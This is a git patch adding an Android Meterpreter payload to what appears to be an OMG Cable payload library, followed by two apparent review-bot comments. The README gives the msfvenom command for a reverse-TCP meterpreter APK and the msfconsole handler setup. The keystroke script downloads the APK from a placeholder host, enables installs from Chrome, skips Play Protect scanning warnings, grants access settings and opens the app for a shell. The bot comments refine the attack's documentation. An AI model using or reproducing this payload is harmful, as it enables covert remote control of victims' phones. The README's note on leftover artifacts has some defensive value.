From 224587b4a546176b192fc4d5c473abf843165edc Mon Sep 17 00:00:00 2001 From: int0x80 Date: Thu, 13 Jan 2022 21:09:38 -0600 Subject: [PATCH] Android Meterpreter --- .../mobile/android/meterpreter/README.md | 39 ++++++ .../mobile/android/meterpreter/payload.txt | 130 ++++++++++++++++++ 2 files changed, 169 insertions(+) create mode 100644 payloads/library/mobile/android/meterpreter/README.md create mode 100644 payloads/library/mobile/android/meterpreter/payload.txt diff --git a/payloads/library/mobile/android/meterpreter/README.md b/payloads/library/mobile/android/meterpreter/README.md new file mode 100644 index 0000000..b6fb9e7 --- /dev/null +++ b/payloads/library/mobile/android/meterpreter/README.md 
@@ -0,0 +1,39 @@ +# Android Meterpreter + +An OMG Cable payload which downloads and installs an APK onto an Android device. Here are the high-level notes. + +I would like to see operating systems prompt for authentication when performing risky behaviors, such as installing a new app. + +## Generate Payload + +Regular `msfvenom` payload generation. + +```D +$ msfvenom -p android/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=5555 -o /data/omg.apk +[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload +[-] No arch selected, selecting arch: dalvik from the payload +No encoder specified, outputting raw payload +Payload size: 79592 bytes +Saved as: /data/omg.apk +``` + +## Handler + +These instructions can also be saved and loaded as an `rc` file via `msfconsole -r`. + +``` +$ msfconsole +msf6 > use exploit/multi/handler +msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp +msf6 exploit(multi/handler) > set lport 5555 +msf6 exploit(multi/handler) > set lhost eth0 +msf6 exploit(multi/handler) > run +``` + +## Miscellaneous + +Some apparent artifacts remain. This is an abbreviated list. + +* Notification shows apk was downloaded +* APK remains installed as MainActivity + * `app_uninstall com.metasploit.stage` does not remove the apk diff --git a/payloads/library/mobile/android/meterpreter/payload.txt b/payloads/library/mobile/android/meterpreter/payload.txt new file mode 100644 index 0000000..bd2ae29 --- /dev/null +++ b/payloads/library/mobile/android/meterpreter/payload.txt 
@@ -0,0 +1,130 @@ +REM # ----------------------------------------------------------- +REM # Title: OMG Android Meterpreter +REM # Description: Download and install an APK on Android +REM # Author: int0x80 +REM # Target: Android 11 +REM # Notes: Set URL for APK payload below +REM # ----------------------------------------------------------- + + +REM # ----------------------------------------------------------- +REM # Launch browser to APK destination +REM # ----------------------------------------------------------- + +GUI b +DELAY 1000 +CTRL l +DELAY 50 +STRING https://x.x.x.x/your-app.apk +DELAY 50 +ENTER +DELAY 2000 + + +REM # ----------------------------------------------------------- +REM # Move focus to 'Open' link +REM # ----------------------------------------------------------- + +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +RIGHT +DELAY 50 +ENTER +DELAY 500 + + +REM # ----------------------------------------------------------- +REM # Select Chrome as approved source to install apps +REM # ----------------------------------------------------------- + +ENTER +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 50 + + +REM # ----------------------------------------------------------- +REM # Finish approved source +REM # GUI DELETE might work here +REM # ----------------------------------------------------------- + +GUI TAB +DELAY 50 +ENTER +DELAY 50 + + +REM # ----------------------------------------------------------- +REM # Scanning and Play Store warnings +REM # Install, Install Anyway, Don't send for scanning, Open +REM # ----------------------------------------------------------- + +RIGHT +DELAY 50 +ENTER +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 50 +ENTER +DELAY 250 + + +REM # ----------------------------------------------------------- +REM # Accept access settings and Continue +REM # 
----------------------------------------------------------- + +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 250 + + +REM # ----------------------------------------------------------- +REM # Get shell and obligatory calc +REM # ----------------------------------------------------------- + +ENTER +DELAY 250 +GUI a
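Review bot: the first code fence in README.md is tagged ```D, which reads as a stray character rather than a language tag, while the second fence is untagged; either drop the `D` or tag both blocks consistently (e.g. ```console). The README also never states the tested platform or browser: payload.txt's header carries `Target: Android 11` and its comments assume Chrome is the default browser, so a short requirements line in the README giving both, plus a note that the generated `/data/omg.apk` must be served at the `https://x.x.x.x/your-app.apk` URL hardcoded in payload.txt, would save readers from having to infer this from the keystroke file. The "Miscellaneous" list is the part most useful to anyone assessing a device afterwards; consider listing the package name `com.metasploit.stage` there next to the `MainActivity` entry so the leftover install is identifiable from either name.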
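Review bot: the comment `GUI DELETE might work here` in the "Finish approved source" block leaves an unverified alternative in the shipped payload; either confirm it and replace the `GUI TAB` / `ENTER` sequence, or remove the speculation so the file documents only what was tested. The header's `Target: Android 11` is the only place the version dependency appears, yet the fixed `TAB` / `DELAY 50` runs (nine TABs to reach "Open", nine more before "Continue") are tied to that exact UI layout, so the header should also record the Chrome version the sequence was verified against, or at least that Chrome must be the default browser, as the "Select Chrome as approved source" block assumes. Minor: the `Notes: Set URL for APK payload below` hint would be clearer if it named the `STRING https://x.x.x.x/your-app.apk` line directly.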